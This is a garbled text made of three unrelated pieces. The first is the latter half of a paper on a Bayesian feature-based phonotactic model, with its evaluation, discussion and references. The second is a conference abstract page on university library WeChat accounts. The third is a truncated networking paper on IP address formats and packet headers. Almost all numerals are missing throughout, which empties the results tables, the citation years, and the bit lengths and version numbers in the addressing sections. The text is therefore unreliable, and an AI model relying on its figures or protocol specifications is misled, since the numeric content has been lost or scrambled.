way to unify the recent for- mal language theoretic advances in computational phonology with computational phonotactic model- ing. our model joins other nlp work attempting to do sequence generation where each symbol is gen- erated based on a rich featural representation of previous symbols (bilmes and kirchhoff, ; duh and kirchhoff, ), though we focus more on phonology-specific representations. our and-or graphs are similar to those used in computer vision to represent possible objects (jin and geman, ). model evaluation and experiments here we evaluate some of the design decisions of our model and compare it to a baseline n-gram model and to a widely-used constraint-based model, blick. in order to probe model behavior, we also we do however note that it may be possible to learn feature hierarchies on a language-by-language basis from universal ar- ticulatory and acoustic biases, as suggested by dresher ( ). present evaluations on artificial data, and a sampling of “representative forms” preferred by one model as compared to another. our model consists of structure-building opera- tions over a learned inventory of subsegments. if our model can exploit more repeated structure in phono- logical forms than the n-gram model or constraint- based models, then it should assign higher probabil- ities to forms. the log probability of a form under a model corresponds to the description length of that form under the model; if a model assigns a higher log probability to a form, that means the model is ca- pable of compressing the form more than other mod- els. 
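stated explicitly, the correspondence invoked here is the usual information-theoretic one:

```latex
\mathrm{DL}(f \mid M) = -\log_2 p(f \mid M) \ \text{bits}
```

so a higher (log) probability for a form means fewer bits, i.e. the model compresses that form more effectively.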
therefore, we compare models on their ability to assign high probabilities to phonological forms, as in goldsmith and riggle ( ). . evaluation of model components we are interested in discovering the extent to which each model component described above— feature dependency graphs (section . ), class node struc- ture (section . ), and tier-based conditioning (sec- tion . )— contributes to the ability of the model to explain wordforms. to evaluate the contribution of feature depen- dency graphs, we compare our models with a base- line n-gram model, which represents phonemes as atomic units. for this n-gram model, we use a hier- archical dirichlet process with n = . to evaluate feature dependency graphs with and without articulated class node structure, we com- pare models using the graph shown in figure (the minimal structure required to produce well- formed phonemes) to models with the graph shown in figure , which includes phonologically moti- vated “class nodes”. to evaluate tier-based conditioning, we compare models with the conditioning described in sec- tions . and . to models where all decisions are conditioned on the full featural specification of the previous n− phonemes. this allows us to isolate improvements due to tier-based conditioning beyond improvements from the feature hierarchy. these feature dependency graphs differ from those in the exposition in section in that they do not include a manner feature; but rather treat vowel as a possible value of manner. duration laryngeal nasal manner suprasegmental backness height rounding c place nd art. lateral otherwisevowel figure : feature dependency graph with class node structure used in our experiments. plain text nodes are or-nodes with no child distributions. the arc marked otherwise represents several arcs, each labelled with a consonant manner such as stop, fricative, etc. duration laryngeal nasal manner suprasegmental backness height rounding c place nd art. lateral otherwisevowel figure : “flat” feature dependency graph. . lexicon data the wolex corpus provides transcriptions for words in dictionaries of diverse languages, rep- resented in terms of phonological features (graff, ). in addition to words, the dictionaries in- clude some short set phrases, such as of course. we use the featural representation of wolex, and de- sign our feature dependency graphs to generate only well-formed phonemes according to this feature sys- tem. for space reasons, we present the evaluation of our model on of these languages, chosen based on the quality of their transcribed lexicons, and the authors’ knowledge of their phonological systems. . held-out evaluation here we test whether the different model configu- rations described above assign high probability to held-out forms. this tests the models’ ability to generalize beyond their training data. we train each model on randomly selected wordforms from a wolex dictionary, and compute posterior predic- tive probabilities for the remaining wordforms from the final state of the model. language ngram flat cl. node flat/no tiers cl.node/no tiers english - . - . - . ∗∗ - . - . french - . - . - . ∗∗ - . - . georgian - . - . - . ∗ - . - . german - . - . - . ∗∗ - . - . greek - . - . - . ∗∗ - . - . haitian creole - . - . - . ∗∗ - . - . lithuanian - . - . - . ∗ - . - . mandarin - . - . ∗ - . ∗∗ - . ∗ - . ∗ mor. arabic - . - . - . ∗ - . - . polish - . - . - . ∗∗ - . - . quechua - . - . - . ∗ - . - . romanian - . - . - . ∗∗ - . - . tatar - . - . - . ∗∗ - . - . turkish - . - . - . ∗∗ - . - . 
table : average log posterior predictive probability of a held-out form. “ngram” is the dp backoff -gram model. “flat” models use the feature dependency graph in fig- ure . “cl. node” models use the graph in figure . see text for motivations of these graphs. “no tiers” models condition each decision on the previous phoneme, rather than on tiers of previous features. asterisks indicate sta- tistical significance according to a t-test comparing with the scores under the n-gram model. * = p < . ; ** = p < . . table shows the average probability of a held- out word under our models and under the n-gram model for one model run. for all languages, we get a statistically significant increase in probabili- ties by adopting the autosegmental model with class nodes and tier-based conditioning. model variants without either component do not significantly out- perform the n-gram model except in chinese. the combination of class nodes and tier-based condition- ing results in model improvements beyond the con- tributions of the individual features. . evaluation on artificial data our model outperforms the n-gram model in pre- dicting held-out forms, but it remains to be shown that this performance is due to capturing the kinds of linguistic intuitions discussed in section . an alternative possibility is that the autosegmental n- gram model, which has many more parameters than a plain n-gram model, can simply learn a more ac- curate model of any sequence, even if that sequence has none of the structure discussed above. to evalu- ate this possibility, we compare the performance of our model in predicting held-out linguistic forms to its performance in predicting held-out forms from artificial lexicons which expressly do not have the the mean standard deviation per form of log probabilities over runs of the full model ranged from . for amharic to . for dutch. linguistic structure we are interested in. if the autosegmental model outperforms the n- gram model even on artificial data with no phono- logical structure, then its performance on the real linguistic data in section . might be overfitting. on the other hand, if the autosegmental model does better on real data but not artificial data, then we can conclude that it is picking up on some real distinc- tive structure of that data. for each real lexicon lr, we generate an artificial lexicon la by training a dp -gram model on lr and forward-sampling |lr| forms. additionally, the forms in la are constrained to have the same distri- bution over lengths as the forms in lr. the resulting lexicons have no tier-based or featural interactions except as they appear by chance from the n-gram model trained on these lexica. for each la we then train our models on the first forms and score the probabilities of the held-out forms, the same pro- cedure as in section . . we ran this procedure for all the lexicons shown in table . for all but one lexicon, we find that the autosegmental models do not significantly outper- form the n-gram models on artificial data. the ex- ception is mandarin chinese, where the average log probability of an artificial form is − . under the n-gram model and − . under the full autoseg- mental model. the result suggests that the anoma- lous behavior of mandarin chinese in section . may be due to overfitting. when exposed to data that explicitly does not have autosegmental structure, the model is not more accurate than a plain sequence model for almost all languages. but when exposed to real linguistic data, the model is more accurate. 
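the artificial-lexicon construction used for this control can be sketched as follows: train an n-gram model on the real lexicon, then forward-sample the same number of forms while matching the real distribution of form lengths by rejection. the BigramModel below is a deliberately simplified stand-in for the dp bigram model described in the text (add-one counts rather than a dirichlet process), so it illustrates the procedure, not the exact model.

```python
import random
from collections import Counter, defaultdict

class BigramModel:
    """Minimal count-based bigram model over symbols (a stand-in for the DP 2-gram)."""
    START, STOP = "<s>", "</s>"

    def __init__(self, forms):
        self.counts = defaultdict(Counter)
        for form in forms:
            prev = self.START
            for seg in list(form) + [self.STOP]:
                self.counts[prev][seg] += 1
                prev = seg

    def sample_form(self, max_len=20):
        prev, out = self.START, []
        while len(out) < max_len:
            options = self.counts[prev] or Counter({self.STOP: 1})
            seg = random.choices(list(options), weights=options.values(), k=1)[0]
            if seg == self.STOP:
                break
            out.append(seg)
            prev = seg
        return "".join(out)

def make_artificial_lexicon(real_lexicon, model):
    """Forward-sample |real_lexicon| forms, reproducing the real length distribution."""
    quota = Counter(len(f) for f in real_lexicon)
    artificial = []
    while quota:
        form = model.sample_form()
        if quota.get(len(form), 0) > 0:
            artificial.append(form)
            quota[len(form)] -= 1
            if quota[len(form)] == 0:
                del quota[len(form)]
    return artificial

real = ["kat", "tak", "taka", "kita", "atak"]
print(make_artificial_lexicon(real, BigramModel(real)))
```

by construction, any sequential structure in the artificial lexicon is only what an n-gram model can produce, which is what makes it a useful control for overfitting.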
this result provides ev- idence that the generative model developed in sec- tion captures true distributional properties of lexi- cons that are absent in n-gram distributions, such as featural and tier-based interactions. . comparison with a constraint-based model here we provide a comparison with hayes and wilson ( )’s phonotactic learner, which out- puts a phonotactic grammar in the form of a set of weighted constraints on feature co-occurrences. this grammar is optimized to match the constraint violation profile in a training lexicon, and so can be seen as a probabilistic model of that lexicon. the authors have distributed one such grammar, blick, as a “reference point for phonotactic probability in experimentation” (hayes, ). here we compare our model against blick on its ability to assign probabilities to forms, as in section . . ideally, we would simply compute the probabil- ity of forms like we did in our earlier model com- parisons. blick returns scores for each form. however, since the probabilistic model underlying blick is undirected, these scores are in fact unnor- malized log probabilities, so they cannot be com- pared directly to the normalized probabilities as- signed by the other models. furthermore, because the probabilistic model underlying blick does not penalize forms for length, the normalizing constant over all forms is in fact infinite, making straightfor- ward comparison of predictive probabilities impos- sible. nevertheless, we can turn blick scores into probabilities by conditioning on further constraints, such as the length k of the form. we enumerate all possible forms of length k to compute the normal- izing constant for the distribution over forms of that length. the same procedure can also be used to com- pute the probabilities of each form, conditioned on the length of the form k, under the n-gram and au- tosegmental models. to compare our models against blick, we cal- culate conditional probabilities for forms of length through from the english lexicon. the forms are those in the wolex corpus; we include them for this evaluation if they are k symbols long in the wolex representation. for our n-gram and au- tosegmental models, we use the same models as in section . . the average probabilities of forms un- der the three models are shown in table . for length - , the autosegmental model assigns the highest probabilities, followed by the n-gram model and blick. for length , blick outperforms the dp n-gram model but not the autosegmental model. our model assigns higher probabilities to short forms than blick. that is, our models have iden- tified more redundant structure in the forms than blick, allowing them to compress the data more. however, the comparison is imperfect in several enumerating and scoring the , , , possible forms of length was computationally impractical. length blick ngram cl. node - . - . - . - . - . - . - . - . - . - . - . - . table : average log posterior predictive probability of an english form of fixed length under blick and our models. english n-gram english full model collaborationist mistrustful a posteriori inharmoniousness sacristy absentmindedness matter of course blamelessness earnest money phlegmatically table : most representative forms for the n-gram model and for our full model (“cl. node” in table ) in en- glish. forms are presented in native orthography, but were scored based on their phonetic form. ways. 
first, blick and our models were trained on different data; it is possible that our training data are more representative of our test data than blick’s training data were. second, blick uses a different underlying featural decomposition than our models; it is possible that our feature system is more ac- curate. nevertheless, these results show that our model concentrates more probability mass on (short) forms attested in a language, whereas blick likely spreads its probability mass more evenly over the space of all possible (short) strings. . representative forms in order to get a sense of the differences between models, we investigate what phonological forms are preferred by different kinds of models. these forms might be informative about the phonotactic patterns that our model is capturing which are not well- represented in simpler models. we calculate the rep- resentativeness of a form f with respect to model m as opposed to m as p(f|m )/p(f|m ) (good, ; tenenbaum and griffiths, ). the forms that are most “representative” of model m are not the forms that m assigns the highest probability, but rather the forms that m ranks highest relative to m . tables and show forms from the lexicon that are most representative of our full model and of the n-gram model for english and turkish. the most turkish n-gram turkish full model üstfamilya büyükkarapınar dekstrin kızılcapınar mnemotekni altınpınar ekskavatör sarımehmetler foksterye karaelliler table : most representative forms for n-gram and au- tosegmental models in turkish. uniquely representative forms for our full model are morphologically complex forms consisting of many productive, frequently reused morphemes such as ness. on the other hand, the representative forms for the n-gram model include foreign forms such as a posteriori (for english) and ekskavatör (for turk- ish), which are not built out of parts that frequently repeat in those languages. the representative forms suggest that the full model places more probability mass on words which are built out of highly produc- tive, phonotactically well-formed parts. discussion we find that our models succeed in assigning high probabilities to unseen forms, that they do so specifi- cally for linguistic forms and not random sequences, that they tend to favor forms with many productive parts, and that they perform comparably to a state- of-the-art constraint-based model in assigning prob- abilities to short forms. the improvement for our models over the n-gram baseline is consistent but not large. we attribute this to the way in which phonological generaliza- tions are used in the present model: in particular, phonological generalizations function primarily as a form of backoff for a sequence model. our mod- els have lexical memoization at each node in a fea- ture dependency graph; as such, the top node in the graph ends up representing transition probabil- ities for whole phonemes conditioned on previous phonemes, and the rest of the feature dependency graph functions as a backoff distribution. when a model has been exposed to many training forms, its behavior will be largely dominated by the n-gram- like behavior of the top node. in future work it might be effective to learn an optimal backoff procedure which gives more influence to the base distribution (duh and kirchhoff, ; wood and teh, ). 
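returning briefly to the representativeness ranking used to produce the tables above: it can be computed directly from per-form log probabilities under the two models. a minimal sketch follows, assuming each model exposes a log-probability function; the toy scorers are stand-ins, not the actual models.

```python
def most_representative(forms, logp_m1, logp_m2, k=5):
    """Rank forms by representativeness of model m1 relative to m2,
    i.e. by p(f|m1)/p(f|m2), computed in log space for numerical stability."""
    scored = [(logp_m1(f) - logp_m2(f), f) for f in forms]
    scored.sort(reverse=True)
    return [f for _, f in scored[:k]]

# Toy illustration with hand-made scoring functions (purely hypothetical).
forms = ["blamelessness", "a posteriori", "mistrustful", "sacristy"]
full_model = lambda f: -1.5 * len(f)
ngram_model = lambda f: -1.4 * len(f) - (2.0 if " " in f else 0.0)
print(most_representative(forms, full_model, ngram_model, k=2))
```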
while the tier-based conditioning in our model would seem to be capable of modeling nonlocal interactions such as vowel harmony, we have not found that the models do well at reproducing these nonlocal interactions. we believe this is because the model’s behavior is dominated by nodes high in the feature dependency graph. in any case, a simple markov model defined over tiers, as we have pre- sented here, might not be enough to fully model vowel harmony. rather, a model of phonological processes, transducing underlying forms to surface forms, seems like a more natural way to capture these phenomena. we stress that this model is not tied to a particular feature dependency graph. in fact, we believe our model provides a novel way of testing different hy- potheses about feature structures, and could form the basis for learning the optimal feature hierarchy for a given data set. the choice of feature dependency graph has a large effect on what featural interactions the model can represent directly. for example, nei- ther feature dependency graph has shared place fea- tures for consonants and vowels, so the model has limited ability to represent place-based restrictions on consonant-vowel sequences such as requirements for labialized or palatalized consonants in the con- text of /u/ or /i/. these interactions can be treated in our framework if vowels and consonants share place features, as in padgett ( ). conclusion we have presented a probabilistic generative model for sequences of phonemes defined in terms of phonological features, based on representational ideas from generative phonology and tools from bayesian nonparametric modeling. we consider our model as a proof of concept that probabilistic structure-building models can include rich featural interactions. our model robustly outperforms an n- gram model on simple metrics, and learns to gener- ate forms consisting of highly productive parts. we also view this work as a test of the scientific hy- potheses that phonological features can be organized in a hierarchy and that they interact along tiers: in our model evaluation, we found that both concepts were necessary to get an improvement over a base- line n-gram model. acknowledgments we would like to thank tal linzen, leon bergen, edward flemming, edward gibson, bob berwick, jim glass, and the audiences at mit’s phonology circle, sigmorphon, and the lsa annual meeting for helpful comments. this work was sup- ported in part by nsf ddrig grant # to r.f. references adam albright. . feature-based generalization as a source of gradient acceptability. phonology, : – . robert c. berwick. . the acquisition of syntactic knowledge. mit press, cambridge, ma. jeff a. bilmes and katrin kirchhoff. . fac- tored language models and generalized parallel back- off. in proceedings of the conference of the north american chapter of the association for com- putational linguistics on human language technol- ogy: companion volume of the proceedings of hlt- naacl –short papers–volume , pages – . as- sociation for computational linguistics. geert booij. . morpheme structure constraints. in the blackwell companion to phonology. blackwell. noam chomsky and morris halle. . some contro- versial questions in phonological theory. journal of linguistics, : – . noam chomsky and morris halle. . the sound pattern of english. harper & row, new york, ny. george n. clements and elizabeth v. hume. . the internal organization of speech sounds. in the hand- book of phonological theory, pages – . black- well, oxford. george n. 
clements. . the geometry of phonologi- cal features. phonology yearbook, : – . john coleman and janet b. pierrehumbert. . stochastic phonological grammars and acceptability. in john coleman, editor, proceedings of the rd meet- ing of the acl special interest group in computa- tional phonology, pages – , somserset, nj. asso- ciation for computational linguistics. robert daland, bruce hayes, james white, marc garellek, andreas davis, and ingrid normann. . explaining sonority projection effects. phonology, : – . carl de marcken. . linguistic structure as com- position and perturbation. in proceedings of the th annual meeting on association for computational lin- guistics, pages – . association for computa- tional linguistics. b. elan dresher. . the contrastive hierarchy in phonology. cambridge university press. kevin duh and katrin kirchhoff. . automatic learning of language model structure. in proceedings of coling , geneva, switzerland. thomas s. ferguson. . a bayesian analysis of some nonparametric problems. annals of statistics, ( ): – . john goldsmith and jason riggle. . information theoretic approaches to phonology: the case of finnish vowel harmony. natural langauge and linguistic the- ory, ( ): – . sharon goldwater, thomas l. griffiths, and mark john- son. . interpolating between types and tokens by estimating power-law generators. in advances in neu- ral information processing systems, volume , pages – , cambridge, ma. mit press. sharon goldwater. . nonparametric bayesian mod- els of lexical acquisition. ph.d. thesis, brown uni- versity. irving john good. . the estimation of probabili- ties. mit press, cambridge, ma. noah d. goodman, vikash k. mansinghka, daniel roy, keith bonawitz, and joshua b. tenenbaum. . church: a language for generative models. in un- certainty in artificial intelligence, helsinki, finland. auai press. peter graff. . communicative efficiency in the lexi- con. ph.d. thesis, massachusetts institute of technol- ogy. morris halle. . the sound pattern of russian: a linguistic and acoustical investigation. mouton, the hague, the netherlands. morris halle. . feature geometry and feature spreading. linguistic inquiry, ( ): – . bruce hayes and colin wilson. . a maximum en- tropy model of phonotactics and phonotactic learning. linguistic inquiry, ( ): – . bruce hayes. . blick - a phonotactic probability calculator. jeffrey heinz, chetan rawal, and herbert g. tanner. . tier-based strictly local constraints for phonol- ogy. in the th annual meeting of the association for computational linguistics. roman jakobson, c. gunnar m. fant, and morris halle. . preliminaries to speech analysis: the distinc- tive features and their correlates. the mit press, cambridge, massachusetts and london, england. adam jardine and jeffrey heinz. . a concatenation operation to derive autosegmental graphs. in proceed- ings of the th meeting on the mathematics of lan- guage (mol ), pages – , chicago, usa, july. ya jin and stuart geman. . context and hierar- chy in a probabilistic image model. in proceedings of the ieee computer society conference on computer vision and pattern recognition (cvrp’ ), pages – . mark johnson and sharon goldwater. . improving nonparameteric bayesian inference: experiments on unsupervised word segmentation with adaptor gram- mars. in naacl-hlt , pages – . associa- tion for computational linguistics. mark johnson, thomas l griffiths, and sharon goldwa- ter. . adaptor grammars: a framework for speci- fying compositional nonparametric bayesian models. 
in advances in neural information processing sys- tems, pages – . mary-louise kean. . the theory of markedness in generative grammar. ph.d. thesis, massachusetts institute of technology. david j.c. mackay and linda c. bauman peto. . a hierarchical dirichlet language model. natural lan- guage engineering, : – . john mccarthy. . feature geometry and depen- dency: a review. phonetica, : – . donald michie. . “memo” functions and machine learning. nature, : – . timothy j. o’donnell. . productivity and reuse in language: a theory of linguistic computation and storage. the mit press, cambridge, massachusetts and london, england. jaye padgett. . consonant-vowel place feature in- teractions. in the blackwell companion to phonol- ogy, pages – . blackwell publishing, malden, ma. ezer rasin and roni katzir. . a learnability argu- ment for constraints on underlying representations. in proceedings of the th annual meeting of the north east linguistic society (nels ), cambridge, mas- sachusetts. jayaram sethuraman. . a constructive definition of dirichlet priors. statistica sinica, pages – . richard stanley. . redundancy rules in phonology. language, ( ): – . yee whye teh. . a bayesian interpretation of in- terpolated kneser-ney. technical report tra / , school of computing, national university of singa- pore. joshua b tenenbaum and thomas l griffiths. . the rational basis of representativeness. in proceedings of the rd annual conference of the cognitive science society, pages – . nikolai s. trubetzkoy. . grundzüge der phonolo- gie. number in travaux du cercle linguistique de prague. vandenhoeck & ruprecht, göttingen. frank wood and yee whye teh. . a hierarchi- cal nonparametric bayesian approach to statistical lan- guage model domain adaptation. in artificial intelli- gence and statistics, pages – . frank wood, cédric archambeau, jan gasthaus, james lancelot, and yee whye teh. . a stochastic memoizer for sequence data. in proceedings of the th international conference on machine learning, montreal, canada. university library internet wechat public account applicated for student values education | atlantis press proceedings journals books series:advances in computer science research proceedings of the second international conference of sensor network and computer engineering (icsnce ) home preface articles authors sessions organizers publishing information <previous article in volume next article in volume> university library internet wechat public account applicated for student values education authors zhao yan corresponding author zhao yan available online april . doi https://doi.org/ . /icsnce- . . how to use a doi? keywords university library; wechat public account; values education abstract with the popularization of intelligent mobile phones, mobile phones instant messaging application has achieved rapid development, at the same time, along with the sns (social network service) development, combined with mobile phones instant messaging and sns has become an important means of the current internet environment for people to communicate, in this trend, the university library is constantly looking for every kind of platform the expansion of information service. 
wechat is a multimedia public-account platform that tencent inc. launched on the basis of wechat; since its official launch in august it has quickly been adopted by restaurants, hotels, banks and other industries and has developed well, and university libraries have likewise made active use of the wechat public platform as a new way of providing information services. in september , the library of beihang university opened a wechat public platform, the first university library in china to launch a wechat service platform, designed to give teachers and students more convenient, fast and varied information services. among china's " " universities, many libraries have opened officially certified wechat public-service accounts; these libraries adopted the platform earlier, have comparatively rich experience in building its functions, and are ahead of other colleges and universities in china. this paper investigates and analyzes how some university libraries in xi'an use wechat public accounts, in order to understand how these libraries provide public services and support teaching through the platform, and in particular how they use wechat public accounts for the values education of college students. through this investigation we summarize the libraries' experience, identify problems, and put forward countermeasures for university libraries to deliver values education to college students through new-media network services.

open access: this is an open access article distributed under the cc by-nc license.

proceedings: second international conference of sensor network and computer engineering (icsnce ), part of the series advances in computer science research. publication date: april . isbn - - - - . issn - x. doi: https://doi.org/ . /icsnce- . .

international journal of advanced network, monitoring and controls volume , no.
, research on ipv , ipv and ipv address representation yury halavachou department of the international relations belarusian state university of transport republic of belarus , kirova street, gomel, republic of belarus e-mail: oms@bsut.by wang yubian department of railway transportation control belarusian state university of transport , kirova street, gomel, republic of belarus e-mail: alika_wang@mail.ru abstract—the new generation network architecture (ipv ) is designed to solve a series of problems such as the shortage of address space and the danger of information security. ipv addresses have a length of bits and a theoretically expressible address space of , while ipv addresses extend to bits and theoretically an address space of . in this paper, by studying ipv , ipv address structure focuses on the new generation of network ipv address representation method. this method adopts the address coding method of the variable-length and variable-position, ranging from bits to bits. moreover, it adopts the mechanism of verification before communication, and relies on the method of assigning addresses to the computers on the internet with full character codes. it redefines the address structure of the future internet and provides new solutions for the internet of things and the internet of everything. keywords-ipv ; ipv ; ipv ; address structure i. network address an interconnected network is made up of lan with interconnected nodes, also known as hosts or routers. each device has a physical address connected to a network with a mac layer address and a logical internet address. because a network address can be logically assigned to any network device, it is also called a logical address. internet addresses are assigned by the internet corporation for assigned names and numbers. the association appoints three local organizations - internic, ripencc and apnic - to carry out location assignments in north america, europe and the asia pacific region. the purpose of this uniform allocation is to ensure that network addresses are globally unique. ii. address space for ipv the entire internet is a single and abstract network. an ip address is a worldwide unique -bit identifier assigned to each interface of every host (or router) on the internet. the structure of ip addresses makes it easy to address them on the internet. a. the base header of ipv the base first format design of ipv is shown in figure . doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , figure . ip datagram format figure shows. the first line of the above section indicates the bits occupied by each field in the header format. the whole header format is divided into fixed part ( bytes in total) and variable part. the variable part is to increase the function of ip datagram, but the variable header length of ip datagram also increases the overhead of each router to process datagram. the following explains the role of the fields in the base ipv header. ) version. ip version. ) header length (hl). it can represent a maximum decimal value of and the most commonly used header length of bytes (header length of ). ) differentiated services. it is used to get better service. ) total length. it refers to the length of the sum of the radical and the data. ) identification. it holds the value of the counter that accumulates the number of datagram. ) flag. 
it is a total of bits, the lowest bit (more fragment) means if there is still fragmentation, the middle bit (don't fragment) means if there is still fragmentation. ) fragment offset. it represents the relative position of a slice in the original grouping after the longer grouping is fragmented. ) time to live. it represents the lifetime of the datagram in the network. ) protocol. it indicates which protocol is used for the data carried by the datagram. ) head checksum. as the datagram passes through each router, the router calculates the sum again. b. classified ip addresses classification of ip address is the most base addressing method, the core of which is to divide the ip address into several fixed classes, each of which is composed of two fixed-length fields: network-id and host-id. the first field indicates the network to which the host or router is connected, and the network number must be unique. the second field identifies the host or router, and a host number must be unique within the range indicated by the network number it is on. thus, the uniqueness of an ip address is ensured. this two-level ip address can be recorded as: ip address: : ={< network number >, < host number >}, where ": : =" means "defined as". figure below shows the network number field and host number field of various ip addresses: international journal of advanced network, monitoring and controls volume , no. , figure . network number field and host number field in ip address figure shows: the network number field of address of class a, b and c (the field is pink in the figure) is , and word length respectively, while the category bit of - bits in the front of the network number field is specified as , and respectively. the host number fields of class a, b, and c addresses are , , and word long, respectively. class d addresses (the first four bits are ) are used for multicast (one-to-many communication). class e addresses (the first four bits are ) are reserved for later use. a dotted decimal notation is presented to improve the readability of ip addresses when it is -bit binary code. in ip addresses, every eight bits is represented in decimal, with a dot inserted between the digits. figure illustrates the convenience of this method. figure . illustrates the decimal system c. improvement of base addressing method because the classified ip address has defects, the ip address addressing method also goes through the following two historical stages. ) subnet partitioning subnet division mainly includes two contents, one is to make the ip address from two to three levels, improve the utilization of ip address space, improve international journal of advanced network, monitoring and controls volume , no. , network performance and enhance the flexibility of ip address; the second is the use of subnet mask, subnet mask and ip address bitwise "and" operation (and) to get the network address, so as to facilitate the datagram sent to the destination network. a) subnet idea  the subnet is still represented as a network.  borrow some bits from the host number of the network as the subnet number, and the two-level ip address becomes the three-level ip address within a certain range, which can be expressed as: ip address: : ={< network number >,< subnet number >,< host number >}  the ip datagram can be sent to the router according to the destination network number, and then the router can find the destination subnet according to the network number and subnet number, and deliver the ip datagram to the destination host. 
b) subnet mask a subnet mask, also known as a network mask or address mask, is a -bit address that consists of a string of one’s followed by a string of zeros. it is used to indicate which bits are the subnet and host that identify an ip address. the following example illustrates the role of subnet masks: [example] the known ip address is . . . , and the subnet mask is . . . .try to find the network address. [answer]the subnet mask is , because the first two bytes of the mask are all , so the first two bytes of the network address can be written as . .the fourth byte of the subnet mask is all , so the fourth byte of the network address is .it can be seen that this question only needs to calculate the third byte in the address, and we can easily obtain the network address by using binary representation of the third byte of ip address and subnet mask, as shown in figure below: figure . solving process of network address ) classless inter-domain routing (constitute super-netting) the main characteristics of classless inter-domain routing (cidr) are as follows: a) cidr eliminates the traditional concept of classified address and subnet division. cidr divides the ip address into a network-prefix and a host number, denoted by: ip address: : ={< network prefix >, < host number >} cidr also uses slash notation. it is to add "/" after the ip address, and write the number of network prefix after the slash, for example: international journal of advanced network, monitoring and controls volume , no. , . . . / = , , , b) cidr address block cidr combines the same network prefix with consecutive ip addresses to form a "cidr address block", which can be specified by the smallest address in the address block and the number of digits in the network prefix. for example: . . . / in the address block: the minimum address is . . . / = the maximum address is . . . / = so the above address can be recorded as . . . / , referred to as "/ address block" for short. the routing table can use a cidr address block containing multiple addresses to query the destination network. this aggregation of addresses is known as routing aggregation and is also known as composition supernettingting. iii. ipv address space ipv is the sixth version of the internet protocol. ipv uses -bit addresses ( bits), which is about . x addresses, but ipv addresses up to bits in length does not say how many addresses there are per square meter of the earth. rather, ipv addresses were designed to be large in size, with the aim of further subdividing them into layered routing domains that reflect the topology of the modern internet. using a -bit address space provides multiple levels of hierarchy and flexibility in designing hierarchical addressing and routing, which is lacking in the current ipv -based internet. ipv addresses consist of global routing prefixes, subnet ids, and interface ids. where the global routing prefix is used to specify a site, the subnet id is used to specify a link within the site, and the interface id is used to specify an interface on the link. a. base ipv headers ipv datagram with multiple optional extension headers is shown in figure , and ipv base headers are shown in figure . figure . ipv datagram with multiple optional extension headers figure . basic ipv header with a length of bytes international journal of advanced network, monitoring and controls volume , no. , as shown in figure , the first line of the figure indicates the bit occupied by each field in the header format. 
compared to ipv , ipv fixed the base header with bytes, eliminated many unnecessary fields, and reduced the number of private segments in the header to (although the header length was doubled). the following explains the function of each field in the ipv basic header: ) version. it specifies the version of the protocol. ) traffic class. it distinguishes between different ipv datagram categories or priorities. ) flow label. it is a new mechanism for ipv to support pre-allocation of resources. ) payload length. it specifies the number of bytes in an ipv datagram other than the base header. ) next head. it is equivalent to the ipv protocol field or optional field. ) hop limit. it is used to prevent datagram from being in the network indefinitely. b. ipv address representation method ) colon hexadecimal form preferred form “n:n:n:n:n:n:n:n”.each n represents a -bit value and is hexadecimal, separated by a colon. for example: “ ffe:ffff: :feda: :ba : : ”. ) compressed form writing a long string of zeros can be simplified using a compressed form, where a single contiguous sequence of zeros is represented by a double colon, “: : ”.this symbol can only appear once in an address. for example, the local link unicast address fe : : : : : : : is shortened as“fe ::/ ”, and the multicast address ffde: : : : : : : is shortened as “ffed:: ”.loop address : : : : : : : compression form “:: ”. an unspecified address : : : : : : : is shortened as “::”. ) mixed form this form combines ipv and ipv addresses. in this case, the address format is “n:n:n:n:n:n:d.d.d.d”. where each “n” represents the -bit value of the ipv address and is represented in hexadecimal, and each “d” represents the -bit value of the ipv address and is represented in decimal. c. transition from ipv to ipv the transition from ipv to ipv can only be done incrementally, because the number of routers using ipv across the internet is so large that it is impractical to set a cut-off point to upgrade the system. there is also backward compatibility when installing a new ipv system.ipv system must be able to complete the ipv system to receive, forward ip datagram and routing selection. here are three strategies for transitioning to ipv : ) dual stack prior to the full transition to ipv , there were stacks of ipv and ipv on some hosts or routers. dual stack hosts or routers can communicate with both ipv and ipv systems. ) tunneling the point of this technique is that the ipv datagram is disguised as an ipv datagram, and the entire ipv datagram becomes the data portion of the ipv datagram. this allows unimpeded access to the ipv network and, upon leaving the ipv network, transfers the data portion of the ipv datagram to the host’s ipv protocol stack.ipv datagram is submitted to the ipv protocol stack to complete the communication. ) network address conversion/protocol conversion technology network address translation/protocol translation technology nat-pt (network address translation - protocol translation) is combined with siit protocol translation, dynamic address translation (nat) under traditional ipv and appropriate application layer gateway (alg).it enables communication between international journal of advanced network, monitoring and controls volume , no. , hosts with only ipv installed and most applications with only ipv machines installed. iv. the research status of ipv and ipv a. 
current status of ipv due to the allocation of ipv addresses adopts the principle of "first come, first served, distributed according to needs", the uneven distribution makes the address allocation has a huge loophole, which makes many countries and regions have insufficient ip address resources. with the development of internet, especially the explosive growth of scale, some inherent defects of ipv are gradually exposed, mainly focusing on address exhaustion, rapid expansion of routing table to the bottleneck, security and service quality is difficult to guarantee, and serious waste of ipv address structure. the design of ipv protocol does not consider the real-time transmission of audio stream and video stream.ipv does not provide encryption and authentication mechanisms, so the secure transmission of confidential data resources cannot be guaranteed. b. current status of ipv due to the limitations of the technology era, there are many defects in the design idea of the address structure of ipv .the richness of the ipv bit address length makes it more than just a matter of extending the address. instead of following the principle of transparency between different protocol layers, ip addresses, which should belong to the protocol of the network layer, are mixed with physical layer addresses and application layer, resulting in a series of fatal consequences. v. ipv address code ipv not only expands the length of ip address, but also makes the network support more address levels. in addition, the method of address coding method of the variable-length and variable-position is adopted, and the parsing link is cancelled. the formal text representation method used by human is directly converted into machine language, which actually reduces the overhead of network. a. ipv header format ipv header format design is shown in figure . figure . header format of ipv figure design explanation is as follows: ) version. it has a length of four bits. internet protocol version number, for ipv , this field must be . ) traffic class. it has a length of bits. the three bits high are used to specify the length of the address, and the value is to , which is the power of .the address length is byte ~ byte.the default value is bits, where is bits, is bits, is bits, is bits, is bits, is bits, is bits, international journal of advanced network, monitoring and controls volume , no. , and is bits. the last five bits specify the communication class and authentication for the source and destination addresses. through are the priority values, where through are used to specify the priority class for the traffic. through are used to specify a communication method for authentication before communication, which is used by the packet sender for traffic control and whether authentication of source and destination addresses is required. through are used to specify absolute traffic that will not fall back when congestion is encountered. for virtual circuits. and respectively assign audio and video, called absolute value, to ensure the uninterrupted transmission of audio and video. the other values are reserved for future use. ) flow label. it is bits long and is used to identify packages that belong to the same business flow. ) payload length. it has a length of bits, including the net payload of bytes, which is the number of bytes contained in the packet behind the ipv header. ) next header. its 